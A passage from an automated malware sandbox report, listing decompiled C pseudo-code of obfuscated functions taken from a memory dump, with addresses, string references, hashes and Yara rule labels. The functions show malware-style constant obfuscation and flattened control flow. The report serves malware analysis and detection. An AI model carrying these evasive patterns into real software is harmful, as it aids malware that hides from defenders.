					L13:
					return 1;
				} else {
					_t145 = _t124 + __ecx;
					while(1) {
						_t110 =  *((intOrPtr*)(_t145 + 0xc));
						if( *((intOrPtr*)(_t145 + 0xc)) == 0) {
							goto L13;
						}
						_t128 = E00254AAF(_t110 + _t146, _v20, _v44, _v48);
						_v40 = _t128;
						__eflags = _t128;
						if(_t128 == 0) {
							L15:
							return 0;
						}
						_t143 =  *_t145 + _t146;
						_t118 =  *((intOrPtr*)(_t145 + 0x10)) + _t146;
						while(1) {
							_t113 =  *_t143;
							__eflags = _t113;
							if(__eflags == 0) {
								break;
							}
							if(__eflags >= 0) {
								_t115 = _t113 + 2 + _t146;
								__eflags = _t113 + 2 + _t146;
							} else {
								_t115 = _t113 & 0x0000ffff;
							}
							_t116 = E00246228(_v24, _v28, _v32, _v36, _t128, _t115);
							_t147 =  &(_t147[4]);
							__eflags = _t116;
							if(_t116 == 0) {
								goto L15;
							} else {
								_t128 = _v40;
								_t143 =  &(_t143[2]);
								 *_t118 = _t116;
								_t118 = _t118 + 4;
								__eflags = _t118;
								continue;
							}
						}
						_t145 = _t145 + 0x14;
						__eflags = _t145;
					}
					goto L13;
				}
			}

0x0024e05a
0x0024e05d
0x0024e065
0x0024e075
0x0024e07b
0x0024e07f
0x0024e081
0x0024e089
0x0024e091
0x0024e099
0x0024e0a1
0x0024e0af
0x0024e0b4
0x0024e0ba
0x0024e0c2
0x0024e0ca
0x0024e0d2
0x0024e0da
0x0024e0de
0x0024e0e3
0x0024e0e9
0x0024e0f1
0x0024e0f9
0x0024e101
0x0024e106
0x0024e10e
0x0024e11b
0x0024e11e
0x0024e122
0x0024e127
0x0024e12f
0x0024e137
0x0024e144
0x0024e148
0x0024e150
0x0024e15d
0x0024e15e
0x0024e162
0x0024e16a
0x0024e172
0x0024e180
0x0024e184
0x0024e18c
0x0024e194
0x0024e198
0x0024e19e
0x0024e21c
0x00000000
0x0024e1a6
0x0024e1a6
0x0024e215
0x0024e215
0x0024e21a
0x00000000
0x00000000
0x0024e1c1
0x0024e1c3
0x0024e1c7
0x0024e1c9
0x0024e227
0x00000000
0x0024e227
0x0024e1d0
0x0024e1d2
0x0024e20c
0x0024e20c
0x0024e20e
0x0024e210
0x00000000
0x00000000
0x0024e1d6
0x0024e1e0
0x0024e1e0
0x0024e1d8
0x0024e1d8
0x0024e1d8
0x0024e1f4
0x0024e1f9
0x0024e1fc
0x0024e1fe
0x00000000
0x0024e200
0x0024e200
0x0024e204
0x0024e207
0x0024e209
0x0024e209
0x00000000
0x0024e209
0x0024e1fe
0x0024e212
0x0024e212
0x0024e212
0x00000000
0x0024e215

Strings

;)m, xrefs: 0024E05D
&L, xrefs: 0024E0F1
TB7f, xrefs: 0024E0DA

Memory Dump Source

Source File: 00000007.00000002.2100502394.0000000000241000.00000020.00000001.sdmp, Offset: 00240000, based on PE: true

Associated: 00000007.00000002.2100489836.0000000000240000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2100590212.000000000025C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID:
String ID: &L$;)m$TB7f
API String ID: 0-1597752287
Opcode ID: ccec81fc12bb8d59d6cf69cf5184f25956325339f73310d4cae82d3e58d50a0d
Instruction ID: 8a034fe38b61b22fdf7d567635567487a0caa02d8bd980a01317fc436f3d04e4
Opcode Fuzzy Hash: ccec81fc12bb8d59d6cf69cf5184f25956325339f73310d4cae82d3e58d50a0d
Instruction Fuzzy Hash: 365177716083028FE718CF25D84591BBBE1FFD4358F104A1DF89996260D7B4DA59CF86

Uniqueness

Uniqueness Score: -1.00%

Function 002561B8, Relevance: 3.8, Strings: 3, Instructions: 77
COMMONCrypto

Download Yara Rule

C-Code - Quality: 97%

			E002561B8(void* __ecx) {
				signed int _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				void* _t64;
				void* _t68;
				void* _t69;
				signed int _t71;
				void* _t75;
				void* _t76;
				signed int* _t78;

				_t78 =  &_v24;
				_v12 = 0x5dfc;
				_v12 = _v12 * 0x23;
				_t69 = __ecx;
				_v12 = _v12 << 7;
				_t75 = 0;
				_v12 = _v12 ^ 0x066cb215;
				_t76 = 0x1b4ca438;
				_v24 = 0xd6f7;
				_v24 = _v24 + 0xffffb773;
				_v24 = _v24 + 0xd9f1;
				_v24 = _v24 + 0xe528;
				_v24 = _v24 ^ 0x000200e6;
				_v16 = 0x64b4;
				_v16 = _v16 + 0xda3f;
				_v16 = _v16 >> 1;
				_v16 = _v16 >> 0xd;
				_v16 = _v16 ^ 0x0000725d;
				_v4 = 0xc8c2;
				_v4 = _v4 | 0x9945d150;
				_v4 = _v4 + 0x9caf;
				_v4 = _v4 ^ 0x99461e9f;
				_v20 = 0xe019;
				_t71 = 0x46;
				_v20 = _v20 / _t71;
				_v20 = _v20 >> 0xd;
				_v20 = _v20 >> 4;
				_v20 = _v20 ^ 0x00001f6d;
				_v8 = 0xf95b;
				_v8 = _v8 | 0x30645c78;
				_v8 = _v8 + 0xffff8663;
				_v8 = _v8 ^ 0x3064d0a8;
				do {
					while(_t76 != 0x108726d) {
						if(_t76 == 0x1b4ca438) {
							_t76 = 0x2a486598;
							continue;
						} else {
							if(_t76 == 0x2a486598) {
								_push(_t71);
								_t68 = E00257F1B();
								_t78 =  &(_t78[1]);
								_t76 = 0x108726d;
								_t75 = _t75 + _t68;
								continue;
							}
						}
						goto L7;
					}
					_t71 = _v16;
					_t64 = E0024D64E(_t71, _v4, _v20, _t69 + 4, _v8);
					_t78 =  &(_t78[3]);
					_t76 = 0xee7d46d;
					_t75 = _t75 + _t64;
					L7:
				} while (_t76 != 0xee7d46d);
				return _t75;
			}

0x002561b8
0x002561bb
0x002561ce
0x002561d2
0x002561d4
0x002561d9
0x002561db
0x002561e3
0x002561e8
0x002561f5
0x002561fd
0x00256205
0x0025620d
0x00256215
0x0025621d
0x00256225
0x00256229
0x0025622e
0x00256236
0x0025623e
0x00256246
0x0025624e
0x00256256
0x00256264
0x00256267
0x0025626b
0x00256270
0x00256275
0x0025627d
0x00256285
0x0025628d
0x00256295
0x0025629d
0x0025629d
0x002562ab
0x002562cb
0x00000000
0x002562ad
0x002562af
0x002562b9
0x002562ba
0x002562bf
0x002562c2
0x002562c7
0x00000000
0x002562c7
0x002562af
0x00000000
0x002562ab
0x002562df
0x002562e3
0x002562e8
0x002562eb
0x002562f0
0x002562f2
0x002562f2
0x00256303

Strings

x\d0, xrefs: 00256285
(, xrefs: 00256205
]r, xrefs: 0025622E

Memory Dump Source

Source File: 00000007.00000002.2100502394.0000000000241000.00000020.00000001.sdmp, Offset: 00240000, based on PE: true

Associated: 00000007.00000002.2100489836.0000000000240000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2100590212.000000000025C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID:
String ID: ($]r$x\d0
API String ID: 0-3053701899
Opcode ID: 51c1d68f1b448b9cd01a0670611b7d4582907cb0fec310406faa2fe7817289f3
Instruction ID: d52b58f4002e07d3a6e5dbf8dc7a1d22ef042eacce058314457d39f5576098e5
Opcode Fuzzy Hash: 51c1d68f1b448b9cd01a0670611b7d4582907cb0fec310406faa2fe7817289f3
Instruction Fuzzy Hash: 1A3184B28083428FD304DE14D88901BBBE0BBE4718F404E5DF899A7261D3B9CE1C8B97

Uniqueness

Uniqueness Score: -1.00%

Function 00250B68, Relevance: 3.8, Strings: 3, Instructions: 75
COMMONCrypto

Download Yara Rule

C-Code - Quality: 83%

			E00250B68(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				void* _t76;

				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E0024602B(_t76);
				_v16 = 0x6860;
				_v16 = _v16 * 0x5b;
				_v16 = _v16 ^ 0xdc6b4abd;
				_v16 = _v16 ^ 0xdc4e778c;
				_v32 = 0xa230;
				_v32 = _v32 << 0xe;
				_v32 = _v32 ^ 0x288c6565;
				_v8 = 0xfe44;
				_v8 = _v8 | 0x4c3583fb;
				_v8 = _v8 + 0xfffff685;
				_v8 = _v8 ^ 0x61a5c761;
				_v8 = _v8 ^ 0x2d906c10;
				_v40 = 0xe5db;
				_v40 = _v40 | 0x9b65f6ba;
				_v40 = _v40 ^ 0x9b65d356;
				_v20 = 0x9adf;
				_v20 = _v20 + 0x49d9;
				_v20 = _v20 + 0xffff68ea;
				_v20 = _v20 ^ 0x00005968;
				_v36 = 0x94a7;
				_v36 = _v36 ^ 0xf3da6fb3;
				_v36 = _v36 ^ 0xf3dae7d2;
				_v28 = 0xd25a;
				_v28 = _v28 + 0x1e41;
				_v28 = _v28 | 0x2f85fa9d;
				_v28 = _v28 ^ 0x2f85d3ee;
				_v12 = 0x5326;
				_v12 = _v12 ^ 0x0ede0c0e;
				_v12 = _v12 >> 7;
				_v12 = _v12 << 4;
				_v12 = _v12 ^ 0x01db8a0a;
				_v24 = 0x6b2;
				_v24 = _v24 << 4;
				_v24 = _v24 | 0x9aa17d8a;
				_t63 =  &_v24;
				_v24 = _v24 ^ 0x9aa13f42;
				_push(_v32);
				_t91 = E0025889D(0x25c0b0, _v16,  *_t63);
				E0024C680(__ecx, _v40, _v20, 0x25c0b0, _v36, _a12, _t79, _a4);
				return E00252025(_v28, _t91, _v12, _v24);
			}

0x00250b70
0x00250b75
0x00250b78
0x00250b7b
0x00250b7c
0x00250b7d
0x00250b82
0x00250b92
0x00250b95
0x00250b9c
0x00250ba3
0x00250baa
0x00250bae
0x00250bb5
0x00250bbc
0x00250bc3
0x00250bca
0x00250bd1
0x00250bd8
0x00250bdf
0x00250be6
0x00250bed
0x00250bf4
0x00250bfb
0x00250c02
0x00250c09
0x00250c10
0x00250c17
0x00250c1e
0x00250c25
0x00250c2c
0x00250c33
0x00250c3a
0x00250c41
0x00250c48
0x00250c4c
0x00250c50
0x00250c57
0x00250c5e
0x00250c62
0x00250c69
0x00250c69
0x00250c70
0x00250c7e
0x00250c96
0x00250cb3

Strings

`h, xrefs: 00250B82
hY, xrefs: 00250C02
&S, xrefs: 00250C3A

Memory Dump Source

Source File: 00000007.00000002.2100502394.0000000000241000.00000020.00000001.sdmp, Offset: 00240000, based on PE: true

Associated: 00000007.00000002.2100489836.0000000000240000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2100590212.000000000025C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID:
String ID: &S$`h$hY
API String ID: 0-860638928
Opcode ID: 49fa3babc41eb602bf01edb783f4afcf5fa581be559c1510a993e40191de345b
Instruction ID: 9d73979509b92fc41db7756b4c3371493649b1f22c47da6a621c5c30d1b351dd
Opcode Fuzzy Hash: 49fa3babc41eb602bf01edb783f4afcf5fa581be559c1510a993e40191de345b
Instruction Fuzzy Hash: 813120B1C00209EBDF49CFA1C94A8EEBFB5FB44314F208158E41276260D3B54A69CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 10007F07, Relevance: 3.0, APIs: 2, Instructions: 8
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E10007F07(struct _EXCEPTION_POINTERS* _a4) {

				SetUnhandledExceptionFilter(0);
				return UnhandledExceptionFilter(_a4);
			}

0x10007f0c
0x10007f1c

APIs

SetUnhandledExceptionFilter.KERNEL32 ref: 10007F0C
UnhandledExceptionFilter.KERNEL32(?), ref: 10007F15

Memory Dump Source

Source File: 00000007.00000002.2107182626.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2107150063.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2107205088.000000001000D000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2107220492.0000000010012000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2107230746.0000000010015000.00000002.00020000.sdmp Download File

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: f7c80f92ea83676b0d4ae0fb41d7acd9273c55ff761cf0af19de4335131d4f5f
Instruction ID: 7be572de92686af6165e4848987e7b2d669c1521723c7f37aea2a3297de6ad46
Opcode Fuzzy Hash: f7c80f92ea83676b0d4ae0fb41d7acd9273c55ff761cf0af19de4335131d4f5f
Instruction Fuzzy Hash: BAB09231044218BBEA003B91DC49BCC3F29EB056A2F004012F60D44064CF6256508AA1

Uniqueness

Uniqueness Score: -1.00%

Function 00255A61, Relevance: 2.7, Strings: 2, Instructions: 155
COMMONCrypto

Download Yara Rule

C-Code - Quality: 68%

			E00255A61(void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v556;
				signed int _v560;
				signed int _v564;
				signed int _v568;
				signed int _v572;
				signed int _v576;
				signed int _v580;
				signed int _v584;
				signed int _v588;
				signed int _v592;
				signed int _v596;
				signed int _v600;
				void* __ecx;
				void* _t115;
				signed int _t129;
				void* _t136;
				void* _t156;
				signed int _t157;
				signed int _t158;
				signed int _t159;
				signed int* _t163;

				_push(_a16);
				_t156 = __edx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				E0024602B(_t115);
				_v564 = 0x4767;
				_t163 =  &(( &_v600)[6]);
				_v564 = _v564 << 9;
				_v564 = _v564 ^ 0x008e895f;
				_t136 = 0x30c826c8;
				_v588 = 0x30cc;
				_v588 = _v588 + 0x4702;
				_t157 = 0x63;
				_v588 = _v588 / _t157;
				_v588 = _v588 + 0xb80e;
				_v588 = _v588 ^ 0x0000cf36;
				_v596 = 0xadf;
				_t158 = 0x66;
				_v596 = _v596 * 0x61;
				_v596 = _v596 / _t158;
				_t159 = 0x4c;
				_v596 = _v596 / _t159;
				_v596 = _v596 ^ 0x0000541c;
				_v592 = 0x64b0;
				_v592 = _v592 * 0x15;
				_v592 = _v592 + 0xa35f;
				_v592 = _v592 >> 0xe;
				_v592 = _v592 ^ 0x0000251e;
				_v600 = 0x3c82;
				_v600 = _v600 | 0xdba50be5;
				_v600 = _v600 ^ 0x0661176e;
				_v600 = _v600 + 0x2491;
				_v600 = _v600 ^ 0xddc40dba;
				_v572 = 0x6631;
				_v572 = _v572 + 0xffff287e;
				_v572 = _v572 + 0x2e34;
				_v572 = _v572 ^ 0xffff8a80;
				_v584 = 0x3cf9;
				_v584 = _v584 ^ 0x209cd78c;
				_v584 = _v584 ^ 0x88ea975c;
				_v584 = _v584 | 0x088f8ebb;
				_v584 = _v584 ^ 0xa8ffe4fe;
				_v560 = 0x5a99;
				_v560 = _v560 << 2;
				_v560 = _v560 ^ 0x0001627e;
				_v576 = 0xc549;
				_v576 = _v576 * 0x36;
				_v576 = _v576 + 0xffff72cb;
				_v576 = _v576 ^ 0x00296382;
				_v568 = 0xc477;
				_v568 = _v568 + 0xffff852d;
				_v568 = _v568 ^ 0x00000bf7;
				_t160 = _v568;
				_v580 = 0xe5ab;
				_v580 = _v580 + 0x26f9;
				_v580 = _v580 + 0xffffb6c9;
				_v580 = _v580 ^ 0x0000c36f;
				do {
					while(_t136 != 0x96b3cdc) {
						if(_t136 == 0xc60f3b0) {
							_t129 = E00259AC7(_v572, _v584,  &_v556, _v560, _t160);
							_t163 =  &(_t163[3]);
							L11:
							asm("sbb ecx, ecx");
							_t136 = ( ~_t129 & 0xe09a757b) + 0x28d0c761;
							continue;
						}
						if(_t136 == 0x1f7f9ad4) {
							_v556 = 0x22c;
							_t129 = E002476F7( &_v556, _v592, _v600, _t160);
							goto L11;
						}
						if(_t136 == 0x28d0c761) {
							return E00254F7D(_v576, _v568, _t160);
						}
						if(_t136 != 0x2dc3f3d6) {
							if(_t136 != 0x30c826c8) {
								goto L16;
							} else {
								_t136 = 0x2dc3f3d6;
								continue;
							}
							L19:
							return _t129;
						}
						_t129 = E00241C88(_t136, _t136, _v580);
						_t160 = _t129;
						_t163 =  &(_t163[3]);
						if(_t129 != 0xffffffff) {
							_t136 = 0x1f7f9ad4;
							continue;
						}
						goto L19;
					}
					_push(_t156);
					_push( &_v556);
					if(_a4() == 0) {
						_t136 = 0x28d0c761;
						goto L16;
					} else {
						_t136 = 0xc60f3b0;
						continue;
					}
					goto L19;
					L16:
				} while (_t136 != 0x22b9bf83);
				return _t129;
			}

0x00255a6b
0x00255a72
0x00255a74
0x00255a7b
0x00255a82
0x00255a89
0x00255a8b
0x00255a90
0x00255a98
0x00255a9b
0x00255aa2
0x00255aaa
0x00255aaf
0x00255abc
0x00255acf
0x00255ad4
0x00255ada
0x00255ae2
0x00255aea
0x00255af7
0x00255afa
0x00255b06
0x00255b0e
0x00255b11
0x00255b15
0x00255b1d
0x00255b2a
0x00255b2e
0x00255b36
0x00255b3b
0x00255b43
0x00255b4b
0x00255b53
0x00255b5b
0x00255b63
0x00255b6b
0x00255b73
0x00255b7b
0x00255b83
0x00255b8b
0x00255b93
0x00255b9b
0x00255ba3
0x00255bab
0x00255bb3
0x00255bbb
0x00255bc0
0x00255bc8
0x00255bd5
0x00255bd9
0x00255be1
0x00255be9
0x00255bf1
0x00255bf9
0x00255c01
0x00255c05
0x00255c0d
0x00255c15
0x00255c1d
0x00255c25
0x00255c25
0x00255c33
0x00255cd1
0x00255cd6
0x00255cac
0x00255cb0
0x00255cb8
0x00000000
0x00255cb8
0x00255c3f
0x00255c9d
0x00255ca5
0x00000000
0x00255cab
0x00255c43
0x00000000
0x00255d11
0x00255c4f
0x00255c57
0x00000000
0x00255c5d
0x00255c5d
0x00000000
0x00255c5d
0x00255d1c
0x00255d1c
0x00255d1c
0x00255c76
0x00255c7b
0x00255c7d
0x00255c83
0x00255c89
0x00000000
0x00255c89
0x00000000
0x00255c83
0x00255cdb
0x00255ce0
0x00255cea
0x00255cf3
0x00000000
0x00255cec
0x00255cec
0x00000000
0x00255cec
0x00000000
0x00255cf5
0x00255cf5
0x00000000

Strings

4., xrefs: 00255B7B
gG, xrefs: 00255A90

Memory Dump Source

Source File: 00000007.00000002.2100502394.0000000000241000.00000020.00000001.sdmp, Offset: 00240000, based on PE: true

Associated: 00000007.00000002.2100489836.0000000000240000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2100590212.000000000025C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: CloseHandle
String ID: 4.$gG
API String ID: 2962429428-791606841
Opcode ID: c2f05fb42b6ff04c4c7a9286f8ef30f30c4201f765be1d6751a13ce882cf6e31
Instruction ID: 376712ba590d1c4c66ac57a7d5af39554ead28240498d9b00c9772e6b84d33a2
Opcode Fuzzy Hash: c2f05fb42b6ff04c4c7a9286f8ef30f30c4201f765be1d6751a13ce882cf6e31
Instruction Fuzzy Hash: AF61AC711187419BD768CF24C89981FBBE1FBC4319F100A1DF586962A0D775CA59CB8B

Uniqueness

Uniqueness Score: -1.00%

Function 0024B112, Relevance: 2.6, Strings: 2, Instructions: 111
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E0024B112() {
				char _v520;
				signed int _v524;
				intOrPtr _v528;
				intOrPtr _v532;
				intOrPtr _v536;
				signed int _v540;
				signed int _v544;
				signed int _v548;
				signed int _v552;
				signed int _v556;
				signed int _v560;
				signed int _v564;
				signed int _v568;
				char* _t91;
				void* _t94;
				intOrPtr _t97;
				signed int _t109;
				signed int _t110;
				short* _t113;

				_v524 = _v524 & 0x00000000;
				_v536 = 0x15a9e0;
				_t94 = 0x2447ce85;
				_v532 = 0xcaf76;
				_v528 = 0x42cbc4;
				_v544 = 0x1d8c;
				_v544 = _v544 << 8;
				_v544 = _v544 ^ 0x001dbb75;
				_v564 = 0xb98d;
				_v564 = _v564 * 0x6d;
				_v564 = _v564 | 0xb6682b1a;
				_t109 = 0x16;
				_v564 = _v564 / _t109;
				_v564 = _v564 ^ 0x084aef85;
				_v568 = 0xa53e;
				_v568 = _v568 | 0x3e6d869d;
				_t110 = 0x46;
				_v568 = _v568 * 0x2b;
				_v568 = _v568 ^ 0x7c6b3e02;
				_v540 = 0x49b5;
				_v540 = _v540 + 0xbc03;
				_v540 = _v540 ^ 0x0001452b;
				_v556 = 0x9474;
				_v556 = _v556 << 0xb;
				_v556 = _v556 ^ 0xd8ad9d33;
				_v556 = _v556 ^ 0xdc0e2a5f;
				_v560 = 0x11f0;
				_v560 = _v560 + 0xffffe240;
				_v560 = _v560 + 0xb761;
				_v560 = _v560 ^ 0x000087cb;
				_v548 = 0x2457;
				_v548 = _v548 / _t110;
				_v548 = _v548 ^ 0x000075df;
				do {
					while(_t94 != 0x14e9f4e4) {
						if(_t94 == 0x21e9d2a8) {
							_t97 =  *0x25ca2c; // 0x6d8300
							_t82 = _t97 + 0x230; // 0x670056
							return E00246636(_t82, _v556, _v560, _v548, _t113);
						}
						if(_t94 == 0x2275b3e1) {
							_t91 = E00253E3F(_t94,  &_v520, __eflags, _v544, _v564);
							_t94 = 0x14e9f4e4;
							continue;
						}
						if(_t94 != 0x2447ce85) {
							goto L15;
						}
						_t94 = 0x2275b3e1;
					}
					_v552 = 0xe342;
					_v552 = _v552 ^ 0x7b193e87;
					_v552 = _v552 ^ 0x7b19ddc7;
					_t113 =  &_v520 + E00250ADC( &_v520, _v568, _v540) * 2;
					while(1) {
						_t91 =  &_v520;
						__eflags = _t113 - _t91;
						if(_t113 <= _t91) {
							break;
						}
						__eflags =  *_t113 - 0x5c;
						if( *_t113 != 0x5c) {
							L10:
							_t113 = _t113 - 2;
							__eflags = _t113;
							continue;
						}
						_t76 =  &_v552;
						 *_t76 = _v552 - 1;
						__eflags =  *_t76;
						if( *_t76 == 0) {
							__eflags = _t113;
							L14:
							_t94 = 0x21e9d2a8;
							goto L15;
						}
						goto L10;
					}
					goto L14;
					L15:
					__eflags = _t94 - 0x318d27d3;
				} while (__eflags != 0);
				return _t91;
			}

0x0024b118
0x0024b11f
0x0024b127
0x0024b12c
0x0024b134
0x0024b13c
0x0024b144
0x0024b149
0x0024b151
0x0024b162
0x0024b16b
0x0024b183
0x0024b188
0x0024b18e
0x0024b196
0x0024b19e
0x0024b1b3
0x0024b1b4
0x0024b1b8
0x0024b1c0
0x0024b1c8
0x0024b1d0
0x0024b1d8
0x0024b1e0
0x0024b1e5
0x0024b1ed
0x0024b1f5
0x0024b1fd
0x0024b205
0x0024b20d
0x0024b215
0x0024b223
0x0024b227
0x0024b233
0x0024b233
0x0024b239
0x0024b2ce
0x0024b2d8
0x00000000
0x0024b2e3
0x0024b241
0x0024b25b
0x0024b262
0x00000000
0x0024b262
0x0024b249
0x00000000
0x00000000
0x0024b24b
0x0024b24b
0x0024b266
0x0024b272
0x0024b27a
0x0024b294
0x0024b2a8
0x0024b2a8
0x0024b2ac
0x0024b2ae
0x00000000
0x00000000
0x0024b299
0x0024b29d
0x0024b2a5
0x0024b2a5
0x0024b2a5
0x00000000
0x0024b2a5
0x0024b29f
0x0024b29f
0x0024b29f
0x0024b2a3
0x0024b2b2
0x0024b2b5
0x0024b2b5
0x00000000
0x0024b2b5
0x00000000
0x0024b2a3
0x00000000
0x0024b2b7
0x0024b2b7
0x0024b2b7
0x00000000

Strings

W$, xrefs: 0024B215
B, xrefs: 0024B266

Memory Dump Source

Source File: 00000007.00000002.2100502394.0000000000241000.00000020.00000001.sdmp, Offset: 00240000, based on PE: true

Associated: 00000007.00000002.2100489836.0000000000240000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2100590212.000000000025C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID:
String ID: B$W$
API String ID: 0-584637061
Opcode ID: 40148a97ac055a85387f62079681aafa80defe17f16155748efa8d5173861576
Instruction ID: 9f8c6248db263abf97bb80827e5669eae6a597db12d722cbdfb29dfaadff97c4
Opcode Fuzzy Hash: 40148a97ac055a85387f62079681aafa80defe17f16155748efa8d5173861576
Instruction Fuzzy Hash: 094187715183028BD719CF20D58955FBBE1FBC8758F104A1EF489661A0D7B4CA4ACF83

Uniqueness

Uniqueness Score: -1.00%

Function 002531E2, Relevance: 2.6, Strings: 2, Instructions: 102
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E002531E2(void* __eflags) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				char _v52;
				char _v572;
				intOrPtr* _t106;
				signed int _t110;
				signed int _t111;

				_v52 = 0;
				_v28 = 0x38ff;
				_v28 = _v28 | 0x657975a1;
				_v28 = _v28 ^ 0x65795a60;
				_v36 = 0xb7c2;
				_t110 = 0x62;
				_v36 = _v36 / _t110;
				_v36 = _v36 ^ 0x0000110e;
				_v24 = 0xe00a;
				_v24 = _v24 << 5;
				_v24 = _v24 + 0xffffb393;
				_v24 = _v24 ^ 0x001b9d0d;
				_v20 = 0xfb31;
				_v20 = _v20 + 0xbdbd;
				_v20 = _v20 + 0x1446;
				_v20 = _v20 ^ 0x0001be9a;
				_v40 = 0x7fef;
				_v40 = _v40 >> 1;
				_v40 = _v40 ^ 0x00001ed5;
				_v8 = 0xf1c1;
				_v8 = _v8 << 7;
				_v8 = _v8 + 0x6d97;
				_v8 = _v8 << 9;
				_v8 = _v8 ^ 0xf29c2a73;
				_v32 = 0xb6f2;
				_v32 = _v32 | 0x667f3c4f;
				_v32 = _v32 ^ 0x667f909f;
				_v16 = 0xa641;
				_t111 = 0x3c;
				_v16 = _v16 / _t111;
				_v16 = _v16 >> 7;
				_v16 = _v16 ^ 0x1e480640;
				_v16 = _v16 ^ 0x1e480386;
				_v44 = 0xa73d;
				_v44 = _v44 >> 0xd;
				_v44 = _v44 ^ 0x000057d1;
				_v48 = 0x6a4b;
				_v48 = _v48 << 7;
				_v48 = _v48 ^ 0x00354ae8;
				_v12 = 0x27be;
				_v12 = _v12 ^ 0xc55dd82d;
				_v12 = _v12 >> 2;
				_v12 = _v12 ^ 0xb51d94d3;
				_v12 = _v12 ^ 0x844acffa;
				_t112 = _v28;
				if(E00241210(_v28, _v36, _t111, _v24,  &_v572, _v20) != 0) {
					_t106 =  &_v572;
					if(_v572 != 0) {
						while( *_t106 != 0x5c) {
							_t106 = _t106 + 2;
							if( *_t106 != 0) {
								continue;
							} else {
							}
							goto L6;
						}
						_t112 = 0;
						 *((short*)(_t106 + 2)) = 0;
					}
					L6:
					E0025375D(_v40, _t112, _t112,  &_v572, _v8, _v32, _v16, _t112,  &_v52, _v44, _t112, _v48, _t112, _v12);
				}
				return _v52;
			}

0x002531f0
0x002531f3
0x002531fa
0x00253201
0x00253208
0x00253214
0x00253219
0x0025321e
0x00253225
0x0025322c
0x00253230
0x00253237
0x0025323e
0x00253245
0x0025324c
0x00253253
0x0025325a
0x00253261
0x00253264
0x0025326b
0x00253272
0x00253276
0x0025327d
0x00253281
0x00253288
0x0025328f
0x00253296
0x0025329d
0x002532a7
0x002532aa
0x002532b3
0x002532b7
0x002532be
0x002532c5
0x002532cc
0x002532d0
0x002532d7
0x002532de
0x002532e2
0x002532e9
0x002532f0
0x002532f7
0x002532fb
0x00253302
0x00253314
0x00253321
0x00253323
0x00253330
0x00253332
0x00253338
0x0025333e
0x00000000
0x00000000
0x00253340
0x00000000
0x0025333e
0x00253342
0x00253344
0x00253344
0x00253348
0x0025336d
0x00253372
0x0025337c

Strings

`Zye, xrefs: 00253201
J5, xrefs: 002532E2

Memory Dump Source

Source File: 00000007.00000002.2100502394.0000000000241000.00000020.00000001.sdmp, Offset: 00240000, based on PE: true

Associated: 00000007.00000002.2100489836.0000000000240000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2100590212.000000000025C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID:
String ID: `Zye$J5
API String ID: 0-1569392922
Opcode ID: a18ca0a6be4549facd08cad680643561a0f933ec655d038f342e6083d984c38d
Instruction ID: e99770e887c118af9e6252dcbb2f2b8738ba2f1bf6c7d9a46704ee9f82a24549
Opcode Fuzzy Hash: a18ca0a6be4549facd08cad680643561a0f933ec655d038f342e6083d984c38d
Instruction Fuzzy Hash: AC4114B1C1021DEBDF59CFA0C94A9EEBBB5FB04304F108199E511B62A0D7B94B58CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 0025889D, Relevance: 2.6, Strings: 2, Instructions: 101
COMMONCrypto

Download Yara Rule

C-Code - Quality: 94%

			E0025889D(signed int* __ecx, void* __edx, void* __eflags) {
				void* _t50;
				signed int _t57;
				signed int _t74;
				signed int _t75;
				signed int _t84;
				unsigned int _t85;
				unsigned int _t86;
				signed int _t93;
				signed int _t94;
				signed int* _t95;
				signed int* _t96;
				signed int _t97;
				signed int _t98;
				unsigned int _t100;
				void* _t106;
				short _t107;
				void* _t108;
				void* _t109;

				_push( *((intOrPtr*)(_t108 + 0x30)));
				_push(__ecx);
				E0024602B(_t50);
				 *((intOrPtr*)(_t108 + 0x30)) = 0x3e4ab4;
				_t95 =  &(__ecx[1]);
				_t107 = 0;
				 *((intOrPtr*)(_t108 + 0x34)) = 0;
				 *(_t108 + 0x24) = 0xc5f8;
				 *(_t108 + 0x24) =  *(_t108 + 0x24) + 0x6051;
				 *(_t108 + 0x24) =  *(_t108 + 0x24) ^ 0x00010c1f;
				 *(_t108 + 0x1c) = 0x21c8;
				_t97 = 0x48;
				 *(_t108 + 0x1c) =  *(_t108 + 0x1c) / _t97;
				 *(_t108 + 0x1c) =  *(_t108 + 0x1c) + 0xffffac68;
				 *(_t108 + 0x1c) =  *(_t108 + 0x1c) ^ 0xffffa2cd;
				 *(_t108 + 0x20) = 0xf93e;
				_t98 = 0xe;
				 *(_t108 + 0x20) =  *(_t108 + 0x20) / _t98;
